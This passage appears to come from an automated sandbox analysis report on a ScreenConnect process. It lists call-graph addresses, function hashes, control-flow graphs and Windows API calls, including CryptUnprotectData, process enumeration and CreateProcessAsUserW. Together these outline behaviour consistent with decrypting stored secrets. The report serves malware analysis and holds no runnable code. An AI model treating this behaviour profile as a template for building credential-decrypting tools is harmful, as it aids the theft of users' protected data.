48df224 50770->50771 50774 5455fd8 50770->50774 50782 5455fe8 50770->50782 50771->50714 50775 545600c 50774->50775 50776 545601c 50774->50776 50777 5456015 50775->50777 50778 5456159 4 API calls 50775->50778 50779 5456168 4 API calls 50775->50779 50790 5456159 50776->50790 50797 5456168 50776->50797 50777->50771 50778->50775 50779->50775 50784 545601c 50782->50784 50785 545600c 50782->50785 50783 5456015 50783->50771 50788 5456159 4 API calls 50784->50788 50789 5456168 4 API calls 50784->50789 50785->50783 50786 5456159 4 API calls 50785->50786 50787 5456168 4 API calls 50785->50787 50786->50785 50787->50785 50788->50785 50789->50785 50791 545619d 50790->50791 50792 545618d 50790->50792 50804 54562d8 50791->50804 50811 54562e8 50791->50811 50794 5456196 50792->50794 50818 5455588 50792->50818 50794->50775 50799 545618d 50797->50799 50801 545619d 50797->50801 50798 5456196 50798->50775 50799->50798 50800 5455588 ProcessIdToSessionId 50799->50800 50800->50799 50802 54562d8 2 API calls 50801->50802 50803 54562e8 2 API calls 50801->50803 50802->50799 50803->50799 50809 5456312 50804->50809 50810 54562ff 50804->50810 50805 5456308 50805->50792 50806 545647a K32EnumProcesses 50807 54564b2 50806->50807 50807->50792 50809->50810 50821 5455594 50809->50821 50810->50805 50810->50806 50816 5456312 50811->50816 50817 54562ff 50811->50817 50812 5456308 50812->50792 50813 545647a K32EnumProcesses 50814 54564b2 50813->50814 50814->50792 50815 5455594 K32EnumProcesses 50815->50816 50816->50815 50816->50817 50817->50812 50817->50813 50819 5456520 ProcessIdToSessionId 50818->50819 50820 5456593 50819->50820 50820->50792 50822 5456428 K32EnumProcesses 50821->50822 50824 54564b2 50822->50824 50824->50809 50894 4f81f50 50895 4f81fa4 ConnectNamedPipe 50894->50895 50896 4f81fe0 50895->50896 50825 4f8ef24 50826 4f8e949 50825->50826 50829 5452688 50826->50829 50840 5452698 50826->50840 50830 5452698 50829->50830 50831 545272a 50830->50831 50832 5452c5a 50830->50832 50834 54527b6 50831->50834 50835 5452688 CryptUnprotectData 50831->50835 50836 5452698 CryptUnprotectData 50831->50836 50851 5452c98 50831->50851 50855 48d6de8 50832->50855 50861 48d6de7 50832->50861 50833 5452cbc 50833->50826 50834->50826 50835->50834 50836->50834 50841 54526e0 50840->50841 50842 545272a 50841->50842 50843 5452c5a 50841->50843 50845 54527b6 50842->50845 50846 5452688 CryptUnprotectData 50842->50846 50847 5452698 CryptUnprotectData 50842->50847 50848 5452c98 CryptUnprotectData 50842->50848 50849 48d6de8 CryptUnprotectData 50843->50849 50850 48d6de7 CryptUnprotectData 50843->50850 50844 5452cbc 50844->50826 50845->50826 50846->50845 50847->50845 50848->50845 50849->50844 50850->50844 50852 5452cbc 50851->50852 50853 48d6de8 CryptUnprotectData 50851->50853 50854 48d6de7 CryptUnprotectData 50851->50854 50852->50834 50853->50852 50854->50852 50856 48d6e07 50855->50856 50857 48d6e13 50855->50857 50856->50833 50867 5452cc1 50857->50867 50875 5452cd0 50857->50875 50858 48d6e8f 50858->50833 50862 48d6e07 50861->50862 50863 48d6e13 50861->50863 50862->50833 50865 5452cc1 CryptUnprotectData 50863->50865 50866 5452cd0 CryptUnprotectData 50863->50866 50864 48d6e8f 50864->50833 50865->50864 50866->50864 50868 5452cf5 50867->50868 50871 5452da9 50867->50871 50868->50871 50872 5452cc1 CryptUnprotectData 50868->50872 50873 5452cd0 CryptUnprotectData 50868->50873 50883 5452eb0 50868->50883 50887 545155c 50871->50887 50872->50871 50873->50871 50876 5452cf5 50875->50876 50879 5452da9 50875->50879 50876->50879 50880 5452cc1 CryptUnprotectData 50876->50880 50881 5452cd0 CryptUnprotectData 50876->50881 50882 5452eb0 CryptUnprotectData 50876->50882 50877 545155c CryptUnprotectData 50878 5452f74 50877->50878 50878->50858 50879->50877 50880->50879 50881->50879 50882->50879 50884 5452ec5 50883->50884 50885 545155c CryptUnprotectData 50884->50885 50886 5452f74 50885->50886 50886->50871 50888 5452f90 CryptUnprotectData 50887->50888 50889 5452f74 50888->50889 50889->50858 50481 bf36b0 50482 bf36c6 50481->50482 50488 bf4c71 50482->50488 50483 bf36cc 50484 bf3764 50483->50484 50493 bfe5e9 50483->50493 50485 bf3739 50490 bf4c90 50488->50490 50489 bf4cc6 50489->50483 50490->50489 50491 bf4d1d RtlGetVersion 50490->50491 50492 bf4dda 50491->50492 50492->50483 50494 bfe614 50493->50494 50495 bfe62e 50493->50495 50494->50495 50498 bfea99 50494->50498 50502 bfeaa8 50494->50502 50495->50485 50500 bfeace 50498->50500 50499 bfeb06 50499->50495 50500->50499 50506 bfeb50 50500->50506 50504 bfeace 50502->50504 50503 bfeb06 50503->50495 50504->50503 50505 bfeb50 2 API calls 50504->50505 50505->50503 50507 bfeb8e 50506->50507 50514 bff788 50507->50514 50508 bfee2f 50509 bfedb7 50509->50508 50518 3700a22 50509->50518 50523 3700ad0 50509->50523 50528 3700a48 50509->50528 50515 bff7b3 50514->50515 50516 bff7ac 50514->50516 50515->50509 50516->50515 50517 bff930 2 API calls 50516->50517 50517->50515 50519 3700a2f 50518->50519 50520 3700a9d 50518->50520 50521 3700510 2 API calls 50519->50521 50520->50509 50522 3700a85 50521->50522 50522->50509 50524 3700a73 50523->50524 50527 3700af2 50523->50527 50525 3700510 2 API calls 50524->50525 50526 3700a85 50525->50526 50526->50509 50527->50509 50529 3700a6d 50528->50529 50530 3700510 2 API calls 50529->50530 50531 3700a85 50530->50531 50531->50509

                                                                                                              Executed Functions

                                                                                                              Function 048D7CB8 Relevance: 6.5, Strings: 4, Instructions: 1496COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~u$ ~u$ ~u$ ~u
                                                                                                              • API String ID: 0-578007478
                                                                                                              • Opcode ID: 8ddb1cf68cb298ada912ea8ecaa6ec1ec6daf264786b4883b2ff05954cb5ada3
                                                                                                              • Instruction ID: 22dd01b222c4e7ec1bed7ab9f0ca6b2ebab90e7ebdac674d6f0415f473644362
                                                                                                              • Opcode Fuzzy Hash: 8ddb1cf68cb298ada912ea8ecaa6ec1ec6daf264786b4883b2ff05954cb5ada3
                                                                                                              • Instruction Fuzzy Hash: 5FE23974A01219CFDB25EF28C8546ADB7F6FF89300F1486A9D509AB354EB71AE85CF40
                                                                                                              Function 048DE598 Relevance: 5.6, Strings: 4, Instructions: 567COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 518 48de598-48de66d call 48df1b6 533 48de66f-48de697 518->533 534 48de6a2-48de732 518->534 670 48de69c call 5457140 533->670 671 48de69c call 5457168 533->671 548 48de77a-48de7c9 call 48de26c 534->548 549 48de734-48de757 534->549 559 48de7fc-48de934 call 48de284 548->559 560 48de7cb-48de7f9 548->560 674 48de759 call 4f8049f 549->674 675 48de759 call 4f804b0 549->675 550 48de75f-48de775 554 48def19-48def9d 550->554 676 48defa0 call 4f842a0 554->676 677 48defa0 call 4f84310 554->677 678 48defa0 call 4f84303 554->678 576 48de94a-48de9cd 559->576 577 48de936-48de942 559->577 560->559 572 48defa6-48df033 call 48d36e0 596 48df035-48df051 572->596 591 48deb03-48deb26 576->591 592 48de9d3-48dea06 576->592 577->576 602 48deb59-48deb81 591->602 603 48deb28-48deb56 591->603 607 48dea0c-48dea2c 592->607 608 48deae6 592->608 600 48df05f 596->600 601 48df053-48df056 596->601 606 48df060 600->606 601->600 618 48debb7-48debe4 602->618 619 48deb83-48debb1 602->619 603->602 606->606 614 48dead1-48deae4 607->614 615 48dea32-48dea3b 607->615 611 48deaeb-48deaf2 608->611 616 48deaf4 611->616 617 48deb00 611->617 614->611 615->608 620 48dea41-48dea4f 615->620 616->617 617->591 624 48dec16-48dec42 618->624 625 48debe6-48dec10 618->625 619->618 627 48deac1-48deacb 620->627 628 48dea51-48dea66 620->628 634 48dec74-48ded1f 624->634 635 48dec44-48dec6e 624->635 625->624 627->614 627->615 631 48dea68-48deab2 628->631 632 48deab4-48deab6 628->632 631->632 632->627 653 48ded51-48ded94 634->653 654 48ded21-48ded4b 634->654 635->634 662 48dedda-48dedf6 653->662 663 48ded96-48dedd8 653->663 654->653 666 48dedf8 662->666 667 48dee04 662->667 663->662 666->667 667->554 670->534 671->534 674->550 675->550 676->572 677->572 678->572
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: +$on^$;$on^$Ccj$S$on^
                                                                                                              • API String ID: 0-1455237188
                                                                                                              • Opcode ID: ef8008acfd3cb14b16b8577d42dd2781ea2ae77cb93277009881a46a27be4b79
                                                                                                              • Instruction ID: c9f388e034aef300eb2fbf6585747bb9dab866a3468bb940680bb45ad4ecc885
                                                                                                              • Opcode Fuzzy Hash: ef8008acfd3cb14b16b8577d42dd2781ea2ae77cb93277009881a46a27be4b79
                                                                                                              • Instruction Fuzzy Hash: 08323A74A00215CFDB14DF29D854AADBBF2EF89300F148AA9E509EB351DB74AD85CF80
                                                                                                              Function 048DCA08 Relevance: 2.0, Strings: 1, Instructions: 775COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~u
                                                                                                              • API String ID: 0-1457475129
                                                                                                              • Opcode ID: fad174949390b081a4bcc4588188d68ae654bdfb20637c0807ac23504b963cf5
                                                                                                              • Instruction ID: b7302688081a637a05adefc6ebe39b3666b25fb1167c7d3e8c88968f39e991b2
                                                                                                              • Opcode Fuzzy Hash: fad174949390b081a4bcc4588188d68ae654bdfb20637c0807ac23504b963cf5
                                                                                                              • Instruction Fuzzy Hash: 56625D70E00219CFDB24DF69C854BADB7F2AF88300F1586A9D509AB350EB75AD85CF90
                                                                                                              Function 00BF4C71 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RtlGetVersion.NTDLL(0000009C), ref: 00BF4DBE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4012479988.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_bf0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Version
                                                                                                              • String ID:
                                                                                                              • API String ID: 1889659487-0
                                                                                                              • Opcode ID: 141700ed86af471b0763f74f2fd6474b888f17734ce66788c645d1c1794d7432
                                                                                                              • Instruction ID: e02e76646bbb1553af75754ed953f75a52cc758d93ac9617d30712d4180486d7
                                                                                                              • Opcode Fuzzy Hash: 141700ed86af471b0763f74f2fd6474b888f17734ce66788c645d1c1794d7432
                                                                                                              • Instruction Fuzzy Hash: 6F417B71A0031D9FDB649F69D8097AEBBB5FB45300F0081E9D60CA7290DB795E88CF92
                                                                                                              Function 04F818F0 Relevance: 1.6, APIs: 1, Instructions: 93processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 04F819BF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcessUser
                                                                                                              • String ID:
                                                                                                              • API String ID: 2217836671-0
                                                                                                              • Opcode ID: 797220cf6beea8cc3b491e4c1df7d939dcbb7eb91d120972ecb1487610d00ba3
                                                                                                              • Instruction ID: a2034e3a24101f8582ea12444663455f2237ad1c6ecf158119f48b4d46c13c23
                                                                                                              • Opcode Fuzzy Hash: 797220cf6beea8cc3b491e4c1df7d939dcbb7eb91d120972ecb1487610d00ba3
                                                                                                              • Instruction Fuzzy Hash: 45413576900209DFCF10CFA9C884ADEBBF5FF48310F15852AE958AB250D735A956CF90
                                                                                                              Function 05451528 Relevance: 1.6, APIs: 1, Instructions: 75encryptionCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05452FF5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4036172965.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5450000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CryptDataUnprotect
                                                                                                              • String ID:
                                                                                                              • API String ID: 834300711-0
                                                                                                              • Opcode ID: 4569f797247156021e6fa34acb0dce54010c5e58e1d481cd6ad101b5f833d41d
                                                                                                              • Instruction ID: 57a8e39aa9103a10b072fa02299701e46a7dd4a6edcb4bb367db4006f7b86458
                                                                                                              • Opcode Fuzzy Hash: 4569f797247156021e6fa34acb0dce54010c5e58e1d481cd6ad101b5f833d41d
                                                                                                              • Instruction Fuzzy Hash: 1831CC768083999FCB01DFA8C850BDEBFF0EF49324F19408AE954AB252C3349449CFA5
                                                                                                              Function 04F80CC8 Relevance: 1.6, APIs: 1, Instructions: 69pipeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateNamedPipeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000004), ref: 04F80D64
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateNamedPipe
                                                                                                              • String ID:
                                                                                                              • API String ID: 2489174969-0
                                                                                                              • Opcode ID: 03e2a05e8acdf0040ce415e3d5f1350db5877e67382517b0d15774fe767a504f
                                                                                                              • Instruction ID: 83789b499d93d4774bc4e8c210f50b664af593d0cc4523320d098832e4256f7e
                                                                                                              • Opcode Fuzzy Hash: 03e2a05e8acdf0040ce415e3d5f1350db5877e67382517b0d15774fe767a504f
                                                                                                              • Instruction Fuzzy Hash: 023103B2800248DFCB10DF9AD888A8EBFF5BF48310F15C059E918AB221D775A559CF51
                                                                                                              Function 0545155C Relevance: 1.6, APIs: 1, Instructions: 57encryptionCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05452FF5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4036172965.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5450000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CryptDataUnprotect
                                                                                                              • String ID:
                                                                                                              • API String ID: 834300711-0
                                                                                                              • Opcode ID: 21f2b5a7c7b965b233e2a20bf7ef180143febb7503b459a54c61e57cb2ed6de0
                                                                                                              • Instruction ID: 791f86c186925c242c2a465e5431fd305d2843ac0b898f6df61ee1fc4ff2f1c6
                                                                                                              • Opcode Fuzzy Hash: 21f2b5a7c7b965b233e2a20bf7ef180143febb7503b459a54c61e57cb2ed6de0
                                                                                                              • Instruction Fuzzy Hash: 432153B6800249DFCF10CF99D844BEEBBF4EB48320F10841AEA18A7201D379A955DFA5
                                                                                                              Function 05452F88 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05452FF5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4036172965.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5450000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CryptDataUnprotect
                                                                                                              • String ID:
                                                                                                              • API String ID: 834300711-0
                                                                                                              • Opcode ID: b5e447d07de298789deaacaf507db6ce160337f7f6f41d5cd2a060d57157108e
                                                                                                              • Instruction ID: 25d798aa9c6068d736ce4fb2dd0c0ec4b390914521cd8c42003d789aa269ee7f
                                                                                                              • Opcode Fuzzy Hash: b5e447d07de298789deaacaf507db6ce160337f7f6f41d5cd2a060d57157108e
                                                                                                              • Instruction Fuzzy Hash: 312142B280024ADFCF10CF99D845BDEBBB4EB48320F10841AEA18A7211C339A555DFA1
                                                                                                              Function 048DB7B0 Relevance: 12.7, Strings: 10, Instructions: 199COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 48db7b0-48db7d2 1 48db80c 0->1 2 48db7d4-48db7e8 0->2 3 48db812-48db82a 1->3 5 48db7ea 2->5 6 48db7f1-48db801 2->6 11 48db82c-48db847 3->11 5->6 6->1 13 48db849-48db85d 11->13 14 48db885-48db89b 11->14 17 48db85f 13->17 18 48db866-48db883 13->18 67 48db89e call 48dbc08 14->67 68 48db89e call 48dbbf8 14->68 17->18 18->14 21 48db8a4-48db8a6 23 48dba4d-48dba66 21->23 24 48db8ac-48db8d6 21->24 26 48dba68 23->26 27 48dba71 23->27 32 48db8dc-48db8ec 24->32 33 48db9da-48db9e6 24->33 26->27 29 48dba72 27->29 29->29 36 48db8ee-48db8f0 32->36 37 48db8f2-48db90b 32->37 38 48db9e8 33->38 39 48db9f2-48dba17 33->39 40 48db93c-48db93e 36->40 49 48db90d 37->49 50 48db914-48db939 37->50 38->39 42 48dba3c-48dba47 39->42 45 48dba19-48dba35 39->45 40->42 43 48db944-48db9af 40->43 42->23 42->24 43->42 63 48db9b5-48db9d8 43->63 45->42 49->50 50->40 63->42 67->21 68->21
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~u$ ~u$ ~u$ ~u$ ~u$#Pon^$3Pon^$CPon^$SPon^$sPon^
                                                                                                              • API String ID: 0-1467734542
                                                                                                              • Opcode ID: b924077016c8223671bc52c8ea78b11d7bedae37ecdead9f739c21d739a0d2c2
                                                                                                              • Instruction ID: 373e8e377499e71452bbc8f699b9ddbaa944e5c257e65acc97fb92a424ba1216
                                                                                                              • Opcode Fuzzy Hash: b924077016c8223671bc52c8ea78b11d7bedae37ecdead9f739c21d739a0d2c2
                                                                                                              • Instruction Fuzzy Hash: DE716C34B01201DBE719EB75D85466E7BA2EF85304B158A2CD50AEB391EF75FD0A8B80
                                                                                                              Function 048DB7A0 Relevance: 10.2, Strings: 8, Instructions: 157COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 69 48db7a0-48db7ad 70 48db7af-48db7d2 69->70 71 48db824-48db82a 69->71 72 48db80c 70->72 73 48db7d4-48db7e8 70->73 75 48db812-48db81b 71->75 76 48db82c-48db847 71->76 72->75 78 48db7ea 73->78 79 48db7f1-48db801 73->79 80 48db823 75->80 82 48db849-48db85d 76->82 83 48db885-48db89b 76->83 78->79 79->72 80->71 87 48db85f 82->87 88 48db866-48db883 82->88 137 48db89e call 48dbc08 83->137 138 48db89e call 48dbbf8 83->138 87->88 88->83 91 48db8a4-48db8a6 93 48dba4d-48dba66 91->93 94 48db8ac-48db8d6 91->94 96 48dba68 93->96 97 48dba71 93->97 102 48db8dc-48db8ec 94->102 103 48db9da-48db9e6 94->103 96->97 99 48dba72 97->99 99->99 106 48db8ee-48db8f0 102->106 107 48db8f2-48db90b 102->107 108 48db9e8 103->108 109 48db9f2-48dba17 103->109 110 48db93c-48db93e 106->110 119 48db90d 107->119 120 48db914-48db939 107->120 108->109 112 48dba3c-48dba47 109->112 115 48dba19-48dba35 109->115 110->112 113 48db944-48db9af 110->113 112->93 112->94 113->112 133 48db9b5-48db9d8 113->133 115->112 119->120 120->110 133->112 137->91 138->91
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~u$ ~u$ ~u$ ~u$#Pon^$3Pon^$CPon^$sPon^
                                                                                                              • API String ID: 0-3517483127
                                                                                                              • Opcode ID: eed2f4ca27a890d3c5848b3be96bb558cfcae59be67f8d8785df9b3765b343db
                                                                                                              • Instruction ID: 3a0e5eb819a82e43d7446000e427e2ef2a9420683c04b77cf23e3db35d63c529
                                                                                                              • Opcode Fuzzy Hash: eed2f4ca27a890d3c5848b3be96bb558cfcae59be67f8d8785df9b3765b343db
                                                                                                              • Instruction Fuzzy Hash: F451AD34A01200CBE719EF75D85456E7BE2EF85304B158A2DD50AEB3A1EF74FD0A8B80
                                                                                                              Function 03705608 Relevance: 4.0, Strings: 3, Instructions: 275COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 870 3705608-370560a 871 370560c-370560e 870->871 872 370560f-3705612 870->872 871->872 873 3705613-3705616 871->873 872->873 874 3705617-370561a 872->874 873->874 875 370561b-3705660 873->875 874->875 880 3705662-3705676 875->880 881 370569a-37056c9 875->881 884 3705678 880->884 885 370567f-370568f 880->885 890 37056cb-37056e1 881->890 891 370570c-3705733 call 3704720 881->891 884->885 885->881 895 37056e3 890->895 896 37056ea-370570a 890->896 956 3705736 call 3705a81 891->956 957 3705736 call 3705aa8 891->957 958 3705736 call 3705a2f 891->958 895->896 896->891 901 3705738-3705749 902 37057a4-37057b3 901->902 903 370574b-3705765 901->903 904 37057b5-37057c9 902->904 905 37057f8-370581f 902->905 912 3705996 903->912 913 370576b-3705793 903->913 909 37057d2-37057f6 904->909 910 37057cb 904->910 916 3705821-3705857 905->916 917 370585a-370587e 905->917 909->905 910->909 919 370599b-37059ac 912->919 952 3705795 call 3706e70 913->952 953 3705795 call 3706e61 913->953 916->917 924 3705880-37058b7 917->924 925 37058b9-37058ff 917->925 924->925 939 3705981-3705994 925->939 940 3705905-370591f 925->940 935 370579b-37057a2 935->902 935->903 939->919 940->912 943 3705921-3705952 940->943 948 3705954-3705970 943->948 949 3705978-370597f 943->949 954 3705972 call 3706e70 948->954 955 3705972 call 3706e61 948->955 949->939 949->940 952->935 953->935 954->949 955->949 956->901 957->901 958->901
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~u$ ~u$c!
                                                                                                              • API String ID: 0-2170482832
                                                                                                              • Opcode ID: d083b203a44613239ae878f654c759e0aa1b789cc85d9554aefcf7b2acd225c0
                                                                                                              • Instruction ID: fd2f939bc911a4cc485c25d0652c1864c7c070a0355dbb5a06555a194054dc56
                                                                                                              • Opcode Fuzzy Hash: d083b203a44613239ae878f654c759e0aa1b789cc85d9554aefcf7b2acd225c0
                                                                                                              • Instruction Fuzzy Hash: AAB18035A00206DFDB15EF68D45599EBBF2EF85320B18856DE519AB361DF31EC068F80
                                                                                                              Function 03703330 Relevance: 2.7, Strings: 2, Instructions: 211COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1267 3703330-37033d5 call 3703648 1279 37033d7-37033ed 1267->1279 1280 3703418-370357e 1267->1280 1283 37033f6-3703416 1279->1283 1284 37033ef 1279->1284 1329 3703581 call 48d2059 1280->1329 1330 3703581 call 48d2068 1280->1330 1283->1280 1284->1283 1314 3703587-3703645 1329->1314 1330->1314
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~u$ ~u
                                                                                                              • API String ID: 0-3557116590
                                                                                                              • Opcode ID: f8e77951d344de54f72b526789abf533c08a39bd8b5a8e755fdf0f819dd6ab60
                                                                                                              • Instruction ID: 73cb75ac8333c65a2b73b7c9d7a813eda7b967e698ab28636a7552ca99fa1c08
                                                                                                              • Opcode Fuzzy Hash: f8e77951d344de54f72b526789abf533c08a39bd8b5a8e755fdf0f819dd6ab60
                                                                                                              • Instruction Fuzzy Hash: 5981603060070ADFE719EF78D45569EBBE2FF84300B048A6CD14A9B755EB75AA088BD4
                                                                                                              Function 048DA64E Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1332 48da64e-48da67f call 48db0c0 1336 48da685-48da69d 1332->1336 1337 48da9b1-48da9b8 1332->1337 1338 48da6cf-48da6d6 1336->1338 1339 48da69f-48da6c9 1336->1339 1377 48da6dc call 48db230 1338->1377 1378 48da6dc call 48db223 1338->1378 1339->1338 1341 48da6e2 1379 48da6e4 call 48db2b0 1341->1379 1380 48da6e4 call 48db2c0 1341->1380 1342 48da6ea-48da71b 1348 48da8e1-48da8fd 1342->1348 1349 48da721-48da734 1342->1349 1352 48da8ff 1348->1352 1353 48da90b 1348->1353 1354 48da736 1349->1354 1355 48da740-48da786 1349->1355 1352->1353 1353->1337 1354->1355 1358 48da788-48da7d0 1355->1358 1359 48da7d2-48da7fd 1355->1359 1358->1359 1360 48da7ff-48da853 1359->1360 1361 48da855-48da86a 1359->1361 1360->1361 1381 48da86c call 48de62c 1361->1381 1382 48da86c call 48deebf 1361->1382 1383 48da86c call 48de598 1361->1383 1384 48da86c call 48de58b 1361->1384 1385 48da86c call 48de827 1361->1385 1386 48da86c call 48deeb6 1361->1386 1363 48da872-48da87a 1365 48da8cd-48da8db 1363->1365 1366 48da87c-48da88b 1363->1366 1365->1348 1365->1349 1375 48da88d call 4f8f9c0 1366->1375 1376 48da88d call 4f8fa10 1366->1376 1369 48da893-48da8b0 1369->1365 1375->1369 1376->1369 1377->1341 1378->1341 1379->1342 1380->1342 1381->1363 1382->1363 1383->1363 1384->1363 1385->1363 1386->1363
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ;Zk$fon^
                                                                                                              • API String ID: 0-3809777597
                                                                                                              • Opcode ID: b3d5552f6b09fa31aeb7795134efe8f846f86b6119ab5dbfe3c8440137a1b1e3
                                                                                                              • Instruction ID: 0b7559f0025bf7eecfbc75978dab009094839d9c1953046f909380f721306c7b
                                                                                                              • Opcode Fuzzy Hash: b3d5552f6b09fa31aeb7795134efe8f846f86b6119ab5dbfe3c8440137a1b1e3
                                                                                                              • Instruction Fuzzy Hash: 7471E974E002298FDB68DF69C854BADB7B2FB88300F1485A9D50DE7354DB70AE859F90
                                                                                                              Function 048D41B8 Relevance: 1.8, Strings: 1, Instructions: 563COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
